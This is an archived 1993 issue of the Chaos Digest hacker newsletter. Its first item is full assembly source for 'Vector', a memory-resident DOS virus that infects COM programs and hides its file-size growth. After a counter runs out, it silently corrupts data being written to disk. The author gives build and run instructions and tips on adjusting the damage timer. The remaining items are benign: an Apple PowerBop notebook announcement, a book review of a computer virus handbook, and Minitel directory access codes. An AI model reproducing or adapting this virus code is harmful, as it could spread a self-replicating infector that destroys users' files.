home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / KAOS1_45.ZIP / KAOS1-45
Encoding:
Text File  |  1993-06-06  |  26.3 KB  |  725 lines

  1. Chaos Digest                Lundi 7 Juin 1993        Volume 1 : Numero 45
  2.                              ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.45 (7 Juin 1993)
  9. File 1--Le virus Vector (essai d'ecriture)
  10. File 2--PowerBop, le portable Apple communicant sans fils (technique)
  11. File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
  12. File 4--L'annuaire electronique [11] en langues etrangeres (acces)
  13.  
  14. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  15. available at no cost by sending a message to:
  16.                 linux-activists-request@niksula.hut.fi
  17. with a mail header or first line containing the following informations:
  18.                     X-Mn-Admin: join CHAOS_DIGEST
  19.  
  20. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  21. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  22. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  23. groups.
  24.  
  25. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  26. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  27. Computer underground Digest archives. They're accessible using anonymous FTP:
  28.  
  29.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  30.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  31.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  32.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  33.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  34.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  35.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  36.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  37.  
  38. CHAOS DIGEST is an open forum dedicated to sharing French information among
  39. computerists and to the presentation and debate of diverse views. ChaosD
  40. material may be reprinted for non-profit as long as the source is cited.
  41. Some authors do copyright their material, and they should be contacted for
  42. reprint permission.  Readers are encouraged to submit reasoned articles in
  43. French, English or German languages relating to computer culture and
  44. telecommunications.  Articles are preferred to short responses.  Please
  45. avoid quoting previous posts unless absolutely necessary.
  46.  
  47. DISCLAIMER: The views represented herein do not necessarily represent
  48.             the views of the moderators. Chaos Digest contributors
  49.             assume all responsibility for ensuring that articles
  50.             submitted do not violate copyright protections.
  51.  
  52. ----------------------------------------------------------------------
  53.  
  54. Date: Wed, 2 Jun 1993 14:03:46 +0100 (WET DST)
  55. From: NTH@altern.com (Necros the Hacker )
  56. Subject: File 1--Le virus Vector (essai d'ecriture)
  57.  
  58.  
  59.                         The  Vector Virus
  60.                                 by
  61.                         Necros the Hacker
  62.  
  63.  
  64. This is a fairly simple virus I wrote a while back. However, for its size
  65. it has some nice features, including
  66.  
  67.       * memory resident in the interrupt vector table;
  68.       * hides file size increases;
  69.       * infects COM programs on opening or execution;
  70.       * small and subtle, but nasty, damage routine.
  71.  
  72. The main aim of the virus was to write something small and well-coded. At
  73. 376 bytes it's not tiny but it's small enough to fit into the interrupt
  74. vector table. The side effects of placing the virus in the interrupt table
  75. are that it may conflict with other programs which use the interrupts, but
  76. more importantly it can go resident without users noticing a decrease in
  77. system memory.
  78.  
  79. Ok, so that's the idea behind it. Now what does it do? Well, it's resident
  80. in memory and infects COM programs when they're opened or executed. Notice
  81. that's COM *programs*, not just files. It checks to see if the file is
  82. actually a COM program with an EXE extension too. The virus has a timer
  83. which counts up to 0FFFh & when this number of writes takes place in DOS
  84. with the virus resident, it performs its damage. The damage is simply to
  85. chnage the data that was written subtly --- a byte is dropped from the
  86. start of the written block & appened to the end. So there's no change in
  87. size of the file that was written. For EXE programs or archive programs or
  88. backup programs this sort of error can ruin the whole file. At least it
  89. makes the job of recovering the undamaged data from the damaged stuff very
  90. difficult.
  91.  
  92. The virus also hides file size increases. Each infected file has its date
  93. increased by a century, so it won't appear as being different in listings.
  94. Only FCB calls are intercepted & massaged into subtracting the virus'
  95. length. I couldn't be bothered to do it for handle calls cos FCBs are used
  96. in the DOS dir command.
  97.  
  98. Anyway, I present this code more as a demonstration of how to do some
  99. common things efficiently. I'm mainly interested in writing good code, so
  100. if anyone's got any suggestions on how to make it better, you can comment
  101. here if the list maintainer is in agreement.
  102.  
  103. Oh, one last thing. The assembler code is turned into a COM program using
  104. tasm & tlink. The resultant program is actually an infector of a program
  105. called test.com. Just create a simple  3-byte program & then run
  106. vector.com which will infect the test program. There's a message at the
  107. end of the virus which can be removed if you want. Don't just overwrite it
  108. with your own. Removing it is a matter of moving the line just after
  109. message db . . . to just before it. Another thing you might want to modify
  110. is the damage timer . . . change 0fffh in the code to some other value.
  111. I'll leave you figure out what to change it to yourself. It shouldn't be
  112. too dificult :)
  113.  
  114. Have fun,
  115. NTH
  116.  
  117. ---------------------------------------------------------------------------
  118. ;VECTOR.ASM            Written by Necros the Hacker      12 Aug 1991
  119. ;TSR virus which resides in interrupt table
  120.  
  121. model tiny
  122. code
  123.       org 100h              ;makes no difference - relocatable
  124. start:
  125.       jmp shell             ;the non-resident part of the virus
  126. ;the three previous bytes are overwritten with host's first bytes
  127.       org 103h
  128. repair:
  129.       mov si,[ds:101h]      ;find offset of virus from 100h
  130.       mov di,100h           ;place to write original file bytes
  131.       push di
  132.       add si,di             ;si is now start of virus
  133.  
  134.       cld
  135.       movsb
  136.       movsw                 ;restore start of host
  137.  
  138.       push es
  139.       xor bx,bx             ;suitably unused register
  140.       mov es,bx
  141.       mov cx,[es:0084h]     ;offset of int 21 handler
  142.       mov dx,[es:0086h]     ;segment of int 21 handler
  143.       push ax
  144.       mov ax,4bf1h
  145.       int 21h
  146.       mov di,ax
  147.       pop ax
  148.       cmp di,0abc0h         ;signature
  149.       jz restart_host       ;already installed
  150.  
  151.       sub si,3              ;point to start of virus again
  152.  
  153. ;code to make resident and hook vectors
  154. ;first save the old vector (in this copy)
  155.       mov (old_int_21-100h)[si],cx
  156.       mov (old_int_21-0feh)[si],dx
  157.  
  158. ;now make the copy!
  159.       mov di,07bh*4
  160.       mov cx,virus_length
  161.       rep movsb
  162.  
  163. ;now hook the vector proper
  164.       cli
  165.       mov [es:0084h],offset handler_offset
  166.       mov [es:0086h],cx
  167.       sti
  168.  
  169. ;and fall through to restart the host
  170.  
  171. restart_host:
  172.       pop es
  173.       ret                   ;start host (note AX unchanged by virus)
  174.  
  175. jump_buf_offset equ $-100h+07bh*4
  176. jump_buf db 0e9h,0,0        ;jump to replace start of host
  177.  
  178. modify_dir proc near
  179.       pushf
  180.       call dword ptr cs:chain_offset
  181.       cmp al,0ffh
  182.       je ret_error
  183.       push es
  184.       push bx
  185.       push ax
  186.       mov ah,2fh
  187.       int 21h
  188.       cmp byte ptr es:[bx],0ffh      ;is extended FCB?
  189.       jne not_extended
  190.       add bx,7
  191. not_extended:
  192.       cmp byte ptr es:[bx+1ah],51    ;year>2105 AD?
  193.       jbe no_mods
  194.       sub word ptr es:[bx+1dh],virus_length
  195. no_mods:
  196.       pop ax
  197.       pop bx
  198.       pop es
  199. ret_error:
  200.       iret
  201.  
  202. modify_dir endp
  203.  
  204. ;new int 21 handler
  205.       even                  ;although the virus is relocatable, it will
  206.                             ;always be on an even address when resident
  207.  
  208. chain_offset equ $-100h+07bh*4       ;alsolute address to chain to
  209. old_int_21 dw 0,0
  210.  
  211. handler_offset equ $-100h+07bh*4
  212. new_handler proc
  213.       cmp ax,4bf1h          ;residency request
  214.       jne is_dir
  215.       mov ax,0abc0h
  216.       iret
  217.  
  218. is_dir:
  219.       cmp ah,11h
  220.       je modify_dir
  221.       cmp ah,12h
  222.       je modify_dir
  223.  
  224.       cmp ah,40h            ;write?
  225.       jne is_open
  226.       cmp bl,3              ;don't affect stdout/stderr/stdin
  227.       jb damage_ok
  228.       inc dx                ;perform damage
  229.       dec word ptr cs:[offset counter_offset]
  230.       jz damage_ok
  231.       dec dx                ;not time for damage, so undo it
  232. damage_ok:
  233.       and word ptr cs:[offset counter_offset],0fffh
  234.       jmp normal_handler
  235.  
  236. is_open:
  237.       cmp ah,3dh            ;open file (read only)
  238.       jne is_exec
  239.  
  240. ;infect only COM (or EXE) files when opened
  241.       push ax
  242.       push si
  243.       mov si,dx
  244.       cld
  245. find_extension:
  246.       lodsb
  247.       or al,al
  248.       je no_infect
  249.       cmp al,'.'            ;look for the extension
  250.       jne find_extension
  251.  
  252. ;OK now check to see if the extension is COM or EXE
  253.       lodsb
  254.       or al,20h
  255.       cmp al,'c'
  256.       jne try_exe
  257.       lodsw
  258.       or ax,2020h
  259.       cmp ax,'mo'
  260.       jne no_infect
  261.       je eligible
  262. try_exe:
  263.       lodsw
  264.       or ax,2020h
  265.       cmp ax,'ex'
  266.       jne no_infect
  267. eligible:
  268.       pop si
  269.       pop ax
  270.       jmp infect_file
  271.  
  272. no_infect:
  273.       pop si
  274.       pop ax
  275.       jmp normal_handler
  276.  
  277. is_exec:
  278.       cmp ax,4b00h            ;EXEC?
  279.       jne normal_handler
  280.  
  281. infect_file:
  282. ;code to infect the file
  283.       push ax
  284.       push bx
  285.       push cx
  286.       push dx
  287.       push ds
  288.  
  289. ;open the file for infecting
  290.       mov ax,3d02h
  291.       xor cx,cx
  292.       pushf
  293.  
  294.       call dword ptr cs:chain_offset
  295.       jc restore_regs
  296.       mov bx,ax
  297.  
  298.       push cs
  299.       pop ds
  300.  
  301.       mov ah,3fh            ;read from handle
  302.       mov cx,3              ;first three bytes
  303.       mov dx,07bh*4h        ;to start of virus (jumped over)
  304.       int 21h
  305.       jc no_date_set        ;only small files
  306.  
  307.       cmp ds:[07bh*4],'ZM'  ;EXE file?
  308.       je no_date_set
  309.  
  310.       mov ax,5700h          ;get time and date stamp
  311.       int 21h
  312.       push cx
  313.       push dx
  314.       cmp dh,51             ;year>=2005 (1980+25+1 from month)
  315.       ja close_file
  316.  
  317.       pop dx
  318.       add dh,200            ;gives same year in next century
  319.       push dx               ;will be set before closing
  320.  
  321.       mov ax,4202h          ;LSEEK to end of file
  322.       xor cx,cx
  323.       xor dx,dx
  324.       int 21h
  325.  
  326.       mov word ptr offset jump_buf_offset+1,ax ;save length of host
  327.  
  328. ;while we're here, append the virus
  329.       mov ah,40h
  330.       mov cx,virus_length
  331.       mov dx,07bh*4
  332.       int 21h
  333.       jc close_file
  334.  
  335.       mov ax,4200h           ;LSEEK to start of file
  336.       xor cx,cx
  337.       xor dx,dx
  338.       int 21h
  339.  
  340.       mov ah,40h             ;write with handle
  341.       mov cx,3
  342.       mov dx,offset jump_buf_offset
  343.       int 21h
  344.  
  345. close_file:
  346.       pop dx
  347.       pop cx
  348.       mov ax,5701h            ;reset time and date
  349.       int 21h
  350. no_date_set:
  351.       mov ah,3eh
  352.       int 21h
  353. restore_regs:
  354.       pop ds
  355.       pop dx
  356.       pop cx
  357.       pop bx
  358.       pop ax
  359.  
  360. normal_handler:               ;either open or EXEC
  361.       jmp dword ptr cs:chain_offset
  362. new_handler endp
  363.  
  364. counter_offset equ $-100h+07bh*4
  365. counter dw 0                  ;when counter reaches zero, byte is "lost"
  366.  
  367. message db 'V3.0 [VECTOR] (c) Necros the Hacker',10,13
  368.         db 'Written Aug 1991 in Tralee, Ireland',10,13
  369.  
  370. virus_length equ $-start
  371.  
  372. shell:
  373. ;open the file for infecting
  374.       mov ax,3d02h
  375.       xor cx,cx
  376.       mov dx,offset filename
  377.       int 21h
  378.       jc shell_error
  379.       mov bx,ax
  380.  
  381.       mov ah,3fh              ;read from handle
  382.       mov cx,3                ;first three bytes
  383.       mov dx,0100h            ;to start of virus (jumped over)
  384.       int 21h
  385.       jc shell_error
  386.  
  387.       mov ax,4202h            ;LSEEK to end of file
  388.       xor cx,cx
  389.       xor dx,dx
  390.       int 21h
  391.  
  392.       mov word ptr jump_buf+1,ax    ;save length of host
  393.  
  394. ;while we're here, append the virus
  395.       mov ah,40h
  396.       mov cx,virus_length
  397.       mov dx,0100h
  398.       int 21h
  399.       jc shell_error
  400.  
  401.       mov ax,4200h            ;LSEEK to start of file
  402.       xor cx,cx
  403.       xor dx,dx
  404.       int 21h
  405.  
  406.       mov ah,40h              ;write with handle
  407.       mov cx,3
  408.       mov dx,offset jump_buf
  409.       int 21h
  410.  
  411.       mov ah,3eh
  412.       int 21h
  413.  
  414. exit_stub:
  415.       mov ax,4c00h
  416.       int 21h
  417. shell_error:
  418.       mov ah,9
  419.       mov dx,offset err$
  420.       int 21h
  421.       jmp exit_stub
  422. err$ db 'Error infecting file',10,13,'$'
  423. filename db 'test.com',0
  424. end start
  425.  
  426. ------------------------------
  427.  
  428. Date: Fri Jun  4 12:07:00 -0600 1993
  429. From: cccf@email.teaser.com (cccf )
  430. Subject: File 2--PowerBop, le portable Apple communicant sans fils (technique)
  431.  
  432.                Apple European R&D extends mobile computing
  433.                      with wireless communications
  434.  
  435.  
  436. Paris La Defense, June 4, 1993--With PowerBop, the first notebook
  437. integrating cordless communications technology, recently launched in
  438. France, Apple European R&D extands mobile computing and enhances
  439. communications capabilities. PowerBop, the newest model of the popular
  440. PowerBook series, offers the highest degree of autonomy on the notebook
  441. computer market today.
  442.  
  443. The ongoing technical cooperation between Apple European R&D Centre based
  444. in Paris, and France Telecom, the French PTO operator resulted in the
  445. integration of radio capabilities with notebook computers making it
  446. possible to connect them to Telepoint services.  Telepoint is expanding
  447. more and more in Europe and uses the most affordable wireless technology
  448. available today.
  449.  
  450. Apple European R&D focuses primarily on modems, on telecommunications in
  451. mobile computers and on products that comply with OSI (Open System Inter-
  452. connection) standards.
  453.  
  454.  
  455. PowerBop: A new dimension in communications freedom
  456. +---------------------------------------------------
  457.  
  458. PowerBop brings notebook users an added dimension of freedom, above and
  459. beyond the inherent benefits of Apple's popular PowerBook models.  The
  460. PowerBop contains a radio modem conform to the CT2 Telepoint standard in
  461. accordance with the Common Air Interface (CAI), adopted in June 1991 on an
  462. European level.  The CT2 standard allows a new generation of personal
  463. telephones.  Their owners are able to use them in public places in large
  464. cities, at home as a traditional cordless phone and in the office via PBX
  465. extensions.
  466.  
  467. Within the PowerBop, the radio modem CT2 provides the ability to connect
  468. it to a full range of communications services, at any time, from any place
  469. that is located between 20 and 500 meters from the base station of the
  470. Pointel network "Bi-Bop", launched by France Telecom in Paris and
  471. Strasbourg on April 22,1993.  These services include: access to the France
  472. Telecom videotex service "Minitel", message and file exchange, fax
  473. transmission, access to servers and databases.
  474.  
  475. Thanks to the low energy consumption of the CT2 technology, the PowerBop
  476. retains its 1 - 1/2 to 2 hours of endurance when the wireless modem is
  477. being used.
  478.  
  479. The PowerBop features all the advantages of the PowerBook 180, Apple's
  480. high-end notebook.  The internal floppy disk drive is replaced by the CT2
  481. modem which means that users do not need to carry any additional equipment
  482. to communicate via the telepoint network.  An external floppy disk drive is
  483. supplied as a standard accessory.
  484.  
  485. Like the Bi-Bop pocket phone designed and developped by France Telecom, the
  486. Apple PowerBop has a small antenna which folds into a special slot.
  487.  
  488. The Express Modem provided as standard equipment inside the PowerBop,
  489. offers a full range of communications functions:
  490.  
  491.    * access to one of the 15,000 Minitel services;
  492.    * fax transmision (reception will be available on the French
  493.      network from Septembre 1993);
  494.    * data transmission from 300 to 14,400 bps.
  495.  
  496. The Express Modem can either be connected directly to a telephone line or
  497. use the Bi-Bop network for wireless communications up to 9,600 bps.
  498.  
  499.  
  500. Digital Cordless Market
  501. +-----------------------
  502.  
  503. European operators view telepoint as a mass market application for wireless
  504. telephones.  At the present time, no European country offers a nationwide
  505. commercial telepoint service.  However there are currently a number of
  506. networks of this type spreading out.  Mainly, in the UK, Netherlands,
  507. Finland and Belgium.
  508.  
  509. In other parts of the world, others such developments are under way, in
  510. Asia, Australia, Canada and the United-States.
  511.  
  512. On the sales side, it appears that all the operators have a common desire
  513. to implement a pricing structure to allow this technology to be affordable
  514. for a consumer market.
  515.  
  516.  
  517. France Telecom's new Bi-Bop service
  518. +-----------------------------------
  519.  
  520. France Telecom took a leading role in the development of European telepoint
  521. services.  On April 22, France Telecom launched the Bi-Bop cordless digital
  522. pocket phone in Paris.  The system which employs the CT2 cordless standard,
  523. sets up a digital radio link between the Bi-Bop terminal and a public or
  524. home base station.
  525.  
  526. The Bi-Bop service covers three main types of use:
  527.  
  528.    * Public use: Bi-Bop subsribers can call anywhere in the world from
  529.      major cities, starting with Paris and Strasbourg.  The network is
  530.      designed to cover major thoroughfares and public places.  Today, some
  531.      3,000 base stations (4,000 by fall 1993) span Paris and the greater
  532.      Paris area (Ile-de-France) and the network will be progressively
  533.      extended to other areas.  Starting in September 1993, subscribers will
  534.      also be able to receive calls, and PowerBop notebook users will have
  535.      fax reception capacities;
  536.  
  537.    * With a private home base station connected to a standard telephone
  538.      outlet, the PowerBop is transformed into a high-performance mobile
  539.      computing tool allowing one to access all private communications
  540.      services;
  541.  
  542.    * Wireless PBXs are available to companies, allowing PowerBop users
  543.      anywhere at a site, for example, to benefit from the same computing
  544.      environment as if the user was at his desk.  The PowerBop can also
  545.      become a mobile fax terminal.
  546.  
  547.  
  548. Availability
  549. +------------
  550.  
  551. The PowerBop will be available through certified Apple Computer France
  552. distributors in June 1993.  PowerBop owners must have a special telephone
  553. subscription with France Telecom.
  554.  
  555.  
  556. Nota Bene
  557. +---------
  558.  
  559. At this time, I am in a luxurous cafe on the Champs-Elysees in Paris in
  560. holidays and I send this note to ChaosD with my PowerBop... without any
  561. problem...
  562.  
  563. ------------------------------
  564.  
  565. Date: Fri Jun  4 12:07:00 -0600 1993
  566. From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep )
  567. Subject: File 3--Critique de _Computer Virus Handbook_ de Highland (livre)
  568. Copyright: Robert M. Slade, 1993
  569.  
  570.  
  571. Elsevier
  572. Mayfield House
  573. 256 Banbury Road
  574. Oxford OX2 7DH
  575. England
  576. 655 Avenue of the Americas
  577. New York, NY   10010
  578. USA
  579. 212-989-5800
  580. fax: 212-633-3990
  581.  
  582.               Computer Virus Handbook, Harold Joseph Highland
  583.                          1990, 0-946395-46-2
  584.  
  585. When Dr. Highland first offered to send me a copy of this work, late in 1992,
  586. he indicated that it was outdated.  In some respects this is true.  Some of
  587. the precautions suggested in a few of the essays which Dr. Highland did not
  588. write tend to sound quaint.  As one example, with the advantage of hindsight,
  589. Jon David's ten page antiviral review checklist contains items of little use,
  590. and has a number of important gaps.  However, for the "general", rather than
  591. "specialist" audience, this work has much to recommend it.  The coverage is
  592. both broad and practical, and the information, although not quite up to date,
  593. is complete and accurate as far as it goes.
  594.  
  595. The book starts with, as the title has it, "Basic Definitions and Other
  596. Fundamentals".  Dr. Highland has collected definitions from a number of
  597. sources here, which makes a refreshing change from some of the dogmatic
  598. assertions in other works.  The fact that the reader is left to make his own
  599. final decision as to a working definition might be frustrating to some, but
  600. is likely reasonable given that the argument over the definition of a virus
  601. is still raging to this day.  With the changes that are still taking place
  602. in terms of new "forms" of viral programs, it is unlikely that this debate
  603. will be settled any time soon.
  604.  
  605. Chapter one also contains important background information on the operation of
  606. the PC and the structure of MS-DOS format disks.  The one shortcoming might be
  607. that so much of the book deals with MS-DOS machines that readers dealing with
  608. other systems may fail to note the generic concepts contained therein.
  609.  
  610. Chapter two is a concise but encompassing overview of the viral situation by
  611. William Hugh Murray.  Using epidemiology as a model, he covers the broad
  612. outline of viral functions within a computing "environment", and examines some
  613. theoretical guidelines to direct the building of policy and procedures for
  614. prevention of viral infection.  The article is broadly helpful without ever
  615. pushing the relation between computer viral and human epidemiology too far.
  616.  
  617. Chapter three deals with history and examples of specific viral programs. This
  618. section is an extremely valuable resource.  While other works reviewed have
  619. contained similar sections, the quality of this segment in Highland's tome is
  620. impressive.  Mention must be made of the reports by Bill Kenny of Digital
  621. Dispatch who provides detailed and accurate descriptions of the operations of
  622. a number of viral programs which are, unfortunately, all still too common.
  623. (Chapter four is similar, containing three reports of viral programs from
  624. other sources.)
  625.  
  626. Large sections of the handbook deal with the evaluation and review of
  627. antiviral software.  (I must say that I had great sympathy with that part of
  628. the preface which dealt with some experiences encountered when trying to
  629. test various packages.)  Chapter five gives an evaluation protocol and test
  630. methodology.  The detail here may lead some to skip over it, but it is
  631. helpful to those who wish to determine how thoroughly the testing was
  632. conducted.  Chapter six, an article by Jon David as mentioned earlier, is
  633. a suggested procedure and checklist for testing antiviral software.  This
  634. chapter is unfortunately weak, and although there is some valuable direction,
  635. one comes away with the impression that the important thing to test is
  636. whether the program runs on a VGA monitor and has a bound manual.  One must,
  637. of course, realize that antiviral testing was then in its infancy, and Mr.
  638. David's article reflects the general tone fo those times.  Chapter seven is
  639. concerned with specific product evaluations, and, as most lists of its type
  640. do, shows its age.  Of the twenty products listed, I recognize only seven
  641. as still being in existence,; of those that still do exist four have changed
  642. substantially in the intervening three years.
  643.  
  644. Chapter eight is an essay by Harry de Maio entitled "Viruses - A Management
  645. Issue", and it must be considered one of the "forgotten gems" of virus
  646. literature.  It debunks a number of myths, and raises a number of issues
  647. seldom discussed in corporate security and virus management.  Chapter nine
  648. is similar, being Dr. Highland's suggested procedures for reducing the risk
  649. of computer virus infection.
  650.  
  651. Chapter ten is a collection of essays on theoretical aspects of computer virus
  652. research and defence.  Fred Cohen is heavily represented here, of course, but
  653. not as singularly as in, for example, Hoffman's "Rogue Programs".
  654.  
  655. Dated as the book may be in some respects, it is still a valuable overview
  656. for those wishing to study viral programs or the defence against them,
  657. particularly in a corporate environment.  While some may find the book to
  658. be "academic" in tone, it never launches into "blue sky" speculations: all
  659. of the material here is realistic.  The "aging" of the product reviews makes
  660. it difficult to consider it still a reference "handbook" or a "how to"
  661. resource, but Dr. Highland's work is by no means to be discarded yet.
  662.  
  663. +++++++++++++++
  664. Vancouver      ROBERTS@decus.ca    | "Do you get guns with your
  665. Institute for  Robert_Slade@sfu.ca |  gun magazines?  No.
  666. Research into  rslade@cue.bc.ca    |  Do you get viruses with your
  667. User           p1@CyberStore.ca    |  virus magazines?  Yes."
  668. Security       Canada V7K 2G6      |               - Kevin Marcus
  669.  
  670. ------------------------------
  671.  
  672. Date: 03 Jun 93 23:59:59 GMT
  673. From: jbcondat@attmail.com (Jean-Bernard Condat )
  674. Subject: File 4--L'annuaire electronique [11] en langues etrangeres (acces)
  675. Repost from: telecom3.373.2@eecs.nwu.edu
  676.  
  677.  
  678. Since the beginning of February, the French "Annuaire Electronique" is
  679. available in Italian language. You can access it, from France, by
  680. dialing 3614 code RAE, and from other countries, by MinitelNet or by a
  681. telephone line: +33 36 43 14 14 code RAE (Ricerca Annuario
  682. Elettronico).
  683.  
  684.              +----------------------------------------+
  685.              |      *R*icerca                         |
  686.              |      *A*nnuario                        |
  687.              |      *E*lettronico                     |
  688.              |                                        |
  689.              |   1    Ricerca di un abbonato          |
  690.              |                                        |
  691.              |   2    LA POSTA : codice di            |
  692.              |        avviamento postale              |
  693.              |                                        |
  694.              |   3    Sapere tutto sull'elenco        |
  695.              |        elettronico                     |
  696.              |                                        |
  697.              |   4    Sapere tutto sul minitel        |
  698.              |                                        |
  699.              |   5    L'elenco elettronico            |
  700.              |        e teletel dall'estero           |
  701.              |                                        |
  702.              |----------------------------------------|
  703.              |          N! scelto: ...    poi  Invio  |
  704.              | (C) France Telecom 1992                |
  705.              +----------------------------------------+
  706.  
  707. For all versions, all diagnostics, instructions and list of
  708. professionnals are translate into the appropriate language.  Five
  709. different options are available: "Search for a subscriber", "The Post
  710. Office: Postal Code", "All you need to know about the Electronic
  711. Directory", "All you need to know about the Minitel", "Electronic
  712. Directory and Teletel from abroad".
  713.  
  714. Called the "11" in France, this service is already available in:
  715.  
  716.    * English: 3614 code ED  [Electronic Directory];
  717.    * Spanish: 3614 code GTE [Guidia Telefonica Electronia];
  718.    * German : 3614 code ETB [Elektronisches Telefonbuch].
  719.  
  720. ------------------------------
  721.  
  722. End of Chaos Digest #1.45
  723. ************************************
  724.  
  725.